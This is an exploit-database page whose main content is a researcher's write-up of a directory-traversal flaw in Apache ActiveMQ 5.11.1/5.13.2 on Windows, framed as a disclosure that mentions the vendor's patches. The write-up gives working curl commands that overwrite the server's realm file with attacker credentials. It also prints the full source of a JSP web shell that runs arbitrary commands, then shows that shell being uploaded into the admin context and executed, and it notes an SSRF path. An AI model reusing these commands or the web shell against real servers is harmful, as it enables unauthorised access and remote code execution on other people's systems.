0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command Execution Vulnerabilities
Author
Risk
[
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
I have recently been playing with Apache ActiveMQ, and came across a simple but interesting directory traversal flaw in the fileserver upload/download functionality. I have only been able to reproduce this on Windows, i.e. where "\" is a path delimiter. An attacker could use this flaw to upload arbitrary files to the server, including a JSP shell, leading to remote code execution. Exploiting Windows systems to achieve RCE The default conf/jetty.xml includes: <bean class="org.eclipse.jetty.security.ConstraintMapping" id="securityConstraintMapping"> <property name="constraint" ref="securityConstraint"> <property name="pathSpec" value="/api/*,/admin/*,*.jsp"> </property></property> </bean> Effectively blocking the upload of JSP files into contexts that will allow them to execute. I imagine there are many ways around this; for my proof of concept I opted to overwrite conf/jetty-realm.properties and set my own credentials: $ cat jetty-realm.properties hacker: hacker, admin $ curl -v -X PUT --data "@jetty-realm.properties" http://TARGET:8161/fileserver/..\\conf\\jetty-realm.properties This seems to have the disadvantage of requiring a reboot of the server to take effect. I am not sure if that is always the case, but if so, I'm pretty sure there is some other workaround that wouldn't require a reboot. The attacker can then take a standard JSP shell: $ cat cmd.jsp <%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> Commands with JSP <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML> Upload it, exploiting the "..\" directory traversal flaw to put it into an executable context: $ curl -u 'hacker:hacker' -v -X PUT --data "@cmd.jsp" http://TARGET:8161/fileserver/..\\admin\\cmd.jsp And pop a calc on the server: $ curl -u 'hacker:hacker' -v -X GET http://TARGET:8161/admin/cmd.jsp?cmd=calc.exe Exploiting non-Windows servers All attempts at directory traversal on a Linux system failed - encoded, double encoded, and UTF-8 encoded "../" were all caught by Jetty. Only "..\" worked. That said, clients can specify the uploadUrl for a blob transfer, e.g.: tcp://localhost:61616?jms.blobTransferPolicy.uploadUrl=http://foo.com An attacker able to enqueue messages could use this to perform server side request forgery to an arbitrary uploadUrl target, even when running on non-Windows servers. Resolution The ActiveMQ project has released an advisory and patches. This is not the first instance of such a flaw in an open source Java application; CVE-2014-7816 comes to mind. It demonstrates that while Java may be platform independent, many developers are used to developing for a particular OS, and don't necessarily take cross-platform concerns into account. # 0day.today [2024-09-29] #